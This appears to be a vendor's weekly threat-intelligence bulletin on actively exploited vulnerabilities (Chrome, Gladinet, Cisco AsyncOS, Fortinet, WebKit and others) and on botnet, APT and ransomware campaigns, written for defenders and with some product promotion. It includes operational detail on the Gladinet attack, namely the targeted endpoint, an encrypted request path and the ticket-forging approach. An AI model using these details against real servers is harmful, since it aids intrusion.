Surge in Active Exploitation Impacts Core Infrastructure and IoT Devices

The past week highlighted the rapid acceleration of exploitation across both enterprise and internet-facing technologies. CISA expanded its Known Exploited Vulnerabilities (KEV) catalog with eight newly exploited flaws affecting a wide range of products, including Google Chrome, Gladinet CentreStack and TrioFox, Cisco, SonicWall SMA1000, Apple, Fortinet, and Sierra Wireless.  

Botnet activity also intensified across cloud and edge environments, with EnemyBot, Sysrv-K, Andoryu, and Androxgh0st ramping up campaigns against exposed cloud services, routers, and web applications by abusing misconfigurations and unpatched systems.

Targeted intrusion activity further reflected the evolving threat landscape, as Cisco confirmed active exploitation of a zero-day in Cisco AsyncOS by the China-linked APT UAT-9686, while Check Point Research linked the Ink Dragon group to ToolShell-based SharePoint attacks. In parallel, S-RM researchers observed React2Shell (CVE-2025-55182) being used as an initial access vector in a Weaxor ransomware incident, highlighting how quickly new vulnerabilities are being operationalized by both state-aligned and financially motivated actors.

Key points:

• 8 vulnerabilities added to the CISA KEV catalog, reflecting recent exploitation activity. ‍
• Cytellite sensor telemetry detected exploit and botnet-driven scanning activity targeting globally exposed assets.  
• Exploitation of React2Shell continues
• Zero-day flaw in Cisco actively exploited by Chinese linked APT
• Ink Dragon threat group was observed exploiting on-premises Microsoft SharePoint servers using the ToolShell exploit chain ‍
• Multiple PRE-NVD vulnerabilities were observed, suggesting potential exploitation prior to public disclosure.

Several high-impact vulnerabilities are currently trending across the cybersecurity community, demanding immediate attention and patch prioritization. Monitoring these emerging and widely discussed threats provides valuable insights, enabling organizations to make informed security decisions and strengthen their overall defense posture.

CVE-2025-14174 - Out of Bounds Memory Access Vulnerability in Google Chromium

An Out-of-Bounds Memory Access vulnerability in Google Chromium’s ANGLE graphics layer allowed remote attackers to trigger unauthorized memory access through a crafted HTML page, potentially impacting any Chromium-based browser such as Google Chrome, Microsoft Edge, and Opera. The flaw was initially tracked under Chromium issue ID 466192044, with details about the component and CVE assignment intentionally withheld. Evidence later confirmed that it was exploited as a zero-day in the wild, prompting urgent security responses. Google has issued patches in Chrome versions 143.0.7499.109/.110 for Windows and macOS and 143.0.7499.109 for Linux to mitigate the risk. The vulnerability has since been added to the CISA KEV catalog, underscoring its active exploitation and the need for immediate remediation.

CVE-2025-14611 - Hard Coded Cryptographic Vulnerability in Gladinet CentreStack and Triofox  

A Hard-Coded Cryptographic Keys vulnerability in Gladinet CentreStack and Triofox allowed attackers to decrypt or forge access tickets due to static AES keys generated by the GenerateSecKey() function in GladCtrl64.dll. This flaw enabled adversaries to craft malicious requests to the /storage/filesvr.dn endpoint often using encrypted paths like vghpI7EToZUDIZDdprSubL3mTZ2 to access sensitive files such as web.config, obtain machine keys, and attempt ViewState deserialization based remote code execution. Attack activity, observed from IP 147.124.216[.]205, affected at least nine organizations across sectors including healthcare and technology and involved chaining the new vulnerability, CVE-2025-14611, with the previously disclosed CVE-2025-11371. Although attackers leveraged never-expiring forged tickets by manipulating username, password, and timestamp fields, their final RCE attempt failed. The issue, which was previously addressed by Gladinet in version 16.12.10420.56791 of CentreStack and TrioFox, has now been added to the CISA KEV catalog, following confirmation of active exploitation.

CVE-2025-20393 - Improper Input Validation Vulnerability in Cisco Multiple Products

An Improper Input Validation vulnerability in Cisco Secure Email Gateway, Secure Email, AsyncOS Software, and Web Manager appliances allowed threat actors to execute arbitrary commands with root privileges on affected systems. Active exploitation revealed that attackers were able to deploy persistence mechanisms to maintain continued access to compromised appliances. All versions of Cisco AsyncOS were affected, provided the Spam Quarantine feature was enabled and exposed to the internet, significantly increasing the attack surface for both physical and virtual deployments. As the vulnerability is unpatched as of writing, organizations are advised to closely monitor Cisco security advisories and immediately restrict or disable external access to affected features. The issue has been added to the CISA KEV catalog, confirming active exploitation in the wild.

CVE-2025-40602 - Missing Authorization Vulnerability in SonicWall SMA1000

A Missing Authorization vulnerability in the SonicWall SMA1000 Appliance Management Console (AMC) allowed attackers to escalate privileges on affected devices. Despite its moderate severity rating, the flaw became significantly more dangerous when chained with the previously disclosed CVE-2025-23006, enabling attackers to achieve unauthenticated remote code execution with root-level privileges. By chaining the two vulnerabilities, attackers were able to bypass authentication entirely and elevate access to full administrative control. SonicWall has released platform hotfixes - builds 12.4.3-03245 and 12.5.0-02283 to remediate the issue. The vulnerability has now been included in the CISA KEV catalog, signaling confirmed and ongoing exploitation in real-world attacks.

CVE-2025-43529 - Use-After-Free WebKit Vulnerability in Apple Multiple Products

A Use-After-Free vulnerability in Apple's WebKit engine affected multiple products, including iOS, iPadOS, macOS Tahoe, tvOS, watchOS, visionOS, and Safari, and allowed remote code execution when processing maliciously crafted web content. Apple confirmed that the flaw discovered by Google’s Threat Analysis Group impacted any HTML parser relying on WebKit, extending risk beyond native Apple platforms to third-party products embedding WebKit. Although technical details were withheld, Apple acknowledged that CVE-2025-43529 and CVE-2025-14174 may have been exploited in an extremely sophisticated, targeted spyware campaign against individuals on versions of iOS prior to iOS 26. The vulnerability has been resolved in iOS/iPadOS 26.2, iOS/iPadOS 18.7.3, macOS Tahoe 26.2, tvOS 26.2, watchOS 26.2, visionOS 26.2, and Safari 26.2. It was recently added to the CISA KEV catalog, following confirmation of in-the-wild exploitation.

CVE-2025-59374 - Embedded Malicious Code Vulnerability in ASUS Live Update

An Embedded Malicious Code vulnerability in ASUS Live Update stemmed from a supply chain compromise in which unauthorized modifications were introduced into distributed update builds. The tampered software caused devices meeting specific targeting conditions to perform unintended actions, indicating selective and controlled abuse. The incident emerged shortly after ASUS confirmed that the Live Update client reached end-of-support on December 4, 2025, leaving affected users without ongoing security fixes. Given the confirmed compromise and lack of future updates, users were advised to discontinue the use of the product immediately. The vulnerability has since been added to the CISA KEV catalog, reflecting verified exploitation in the wild.

CVE-2025-59718 - Improper Verification of Cryptographic Signature Vulnerability in Fortinet Multiple Products

An Improper Verification of Cryptographic Signature vulnerability in Fortinet FortiOS, FortiSwitchMaster, FortiProxy, and FortiWeb allowed unauthenticated attackers to bypass FortiCloud SSO authentication using crafted SAML messages when the feature was enabled. Threat actors began actively exploiting the flaw shortly after public disclosure, conducting malicious SSO login attempts primarily targeting the adminaccount from infrastructure associated with hosting providers such as The Constant Company LLC, BL Networks, and Kaopu Cloud HK Limited. Although FortiCloud SSO is disabled by default, it is automatically enabled during FortiCare registration unless administrators explicitly disable it, increasing exposure. Fortinet has released multiple patched versions and advised affected organizations to temporarily disable FortiCloud SSO until upgrades can be applied. The vulnerability has since been added to the CISA KEV catalog, confirming active exploitation in the wild.  

CVE-2018-4063 - Unrestricted Upload of File with Dangerous Type Vulnerability in Sierra Wireless AirLink ALEOS

An Unrestricted Upload of File with Dangerous Type vulnerability in Sierra Wireless AirLink ALEOS in ES450 FW 4.9.3 allowed attackers to upload malicious files to the device due to insufficient controls in the template file-upload mechanism. By specifying arbitrary filenames and overwriting existing executable CGI or shell script files, an authenticated attacker could achieve arbitrary code execution through the ACEManager web interface, which operates with root privileges. The AirLink ES450 commonly used in distributed enterprise environments, point-of-sale infrastructure, and remote SCADA systems was particularly exposed, despite ACEManager not being accessible from the Cellular WAN by default. The vulnerability was further aggravated by the product’s End-of-Life status, leaving organizations without vendor patches and necessitating discontinuation of use. This flaw has since been added to the CISA KEV catalog, indicating confirmed exploitation in the wild.

Cytellite telemetry captured active exploit attempts and mass scanning campaigns against exposed services globally. The data highlights which vulnerabilities are under attack and provides source IPs and payloads to authorized teams for detailed threat analysis and validation.

Multiple vulnerabilities were actively exploited by botnets, demonstrating automated infection and propagation across vulnerable systems. Analysis of MISP logs identified the top CVEs targeted by botnets, with payloads indicative of botnet activity, such as using wget commands with specific IP addresses, highlighting ongoing automated exploitation campaigns.

Active malware campaigns exploited specific vulnerabilities to deliver payloads and carry out post-exploitation actions. Each targeted vulnerability is proactively monitored, manually analysed, and mapped to MITRE ATT&CK tactics and techniques. Insights are derived from the LOVI vulnerability intelligence platform, which aggregates and curates data from multiple sources, OSINT groups, blogs, and data leak sites.

CVE-2025-20393

According to Cisco, this maximum severity zero-day vulnerability in Cisco AsyncOS, was actively exploited by a China-linked advanced persistent threat (APT) actor tracked as UAT-9686, targeting Cisco Secure Email Gateway and Cisco Secure Email and Web Manager appliances. Cisco stated it became aware of the intrusion campaign on December 10, 2025, identifying a limited subset of internet-exposed appliances with specific ports open, although the full scope of affected customers remains unknown. Analysis of the activity indicated exploitation dating back to late November 2025, with the threat actor leveraging the flaw to deploy tunneling tools such as ReverseSSH (AquaTunnel) and Chisel, along with a log-cleaning utility known as AquaPurge. The use of AquaTunnel aligns with tooling previously associated with Chinese threat groups including APT41 and UNC5174. In addition, attackers deployed a lightweight Python-based backdoor dubbed AquaShell, capable of receiving encoded commands and executing them on compromised systems.

China-Linked Ink Dragon Targets SharePoint via ToolShell Exploit Chain

Check Point Research identified a new wave of attacks in recent months attributed to a China-aligned threat actor tracked as Ink Dragon, which is also referenced by the broader cybersecurity community as CL-STA-0049, Earth Alux and REF7707. The group was assessed to have been active since at least March 2023. During the observed campaigns, Ink Dragon exploited publicly disclosed machine keys to perform ASP.NET ViewState deserialization and further weaponized ToolShell SharePoint vulnerabilities to deploy web shells on compromised servers. ToolShell represented an exploit chain targeting on-premises Microsoft SharePoint, combining authentication bypass and unsafe deserialization flaws including CVE-2025-49706/ CVE-2025-53771 and CVE-2025-49704 / CVE-2025-53770 to achieve unauthenticated remote code execution and persistent web shell installation on vulnerable environments.

CVE-2025-55182

S-RM researchers observed an incident in which a financially motivated threat actor exploited React2Shell - CVE-2025-55182 as the initial access vector to breach a corporate environment and deploy Weaxor ransomware, marking a shift from previously observed exploitation patterns. Weaxor, believed to be a rebrand of the Mallox/FARGO operation, conducted opportunistic attacks against public-facing servers and demanded relatively low ransoms without evidence of data exfiltration or double extortion. Shortly after initial access, the attackers executed an obfuscated PowerShell command to deploy a Cobalt Strike beacon for command-and-control, disabled Windows Defender real-time protection, and launched the ransomware payload, completing the sequence in under a minute. While the rapid execution suggested possible automation, investigators found no conclusive evidence to confirm it. The activity remained confined to the React2Shell-vulnerable endpoint, with no lateral movement observed.

PRE-NVD vulnerabilities refer to security flaws that are discovered, discussed, or even exploited in the wild before their official inclusion in the National Vulnerability Database (NVD). These early-stage vulnerabilities often emerge through threat actor chatter, exploit proof-of-concepts, and technical disclosures shared across social media platforms and underground forums, signaling potential exploitation risks before public awareness.

The week’s activity highlighted the speed at which vulnerabilities are being operationalized across enterprise, cloud, and edge environments, blurring the line between zero-days, botnet campaigns, and ransomware operations. The rapid adoption of newly disclosed flaws by state-linked actors reinforced the need for prioritization based on real-world exploitation rather than theoretical risk alone. LOVI delivers continuous visibility into actively exploited vulnerabilities, threat actor behavior, and attack trends, enabling security teams to cut through noise and focus on what is truly being abused. By aligning vulnerability intelligence with live threat activity, LOVI helps organizations respond faster and defend more effectively.

FAQs:

1) What is React2Shell and why is it appealing for threat actors?

A) React2Shell refers to CVE-2025-55182, a critical RCE flaw in React Server Components that allows unauthenticated attackers to run arbitrary code on vulnerable servers. Its appeal lies in the zero-authentication attack surface, widespread adoption of React frameworks, and the ability to rapidly gain initial access for malware deployment, persistence, or botnet expansion.

2) How does LOVI help organizations manage vulnerabilities effectively?

A) Loginsoft Vulnerability Intelligence empowers you to efficiently prioritize and respond to potential vulnerabilities by focusing on those actively exploited in the wild. LOVI correlates vulnerability data with real-world threat activity to reduce noise and improve decision-making. This approach enables faster remediation and stronger security posture.

3) How do hard-coded cryptographic vulnerabilities arise?

A) Hard-coded cryptographic vulnerabilities arise when encryption keys, secrets, or passwords are embedded directly in source code or binaries instead of being generated securely at runtime or stored in protected key management systems. This practice often results from poor key management design, legacy implementations, or attempts to simplify deployment. Once exposed, static keys can be reused by attackers to decrypt data, forge tokens, or bypass authentication across all affected deployments.

4) What is Cytellite?

A) Cytellite is a Loginsoft security intelligence platform that provides real-time visibility into emerging threats through a global sensor network. It delivers actionable IP intelligence to help organizations detect, analyze, and respond to attacks quickly. By correlating threat data with live activity, Cytellite strengthens resilience across dynamic threat landscapes.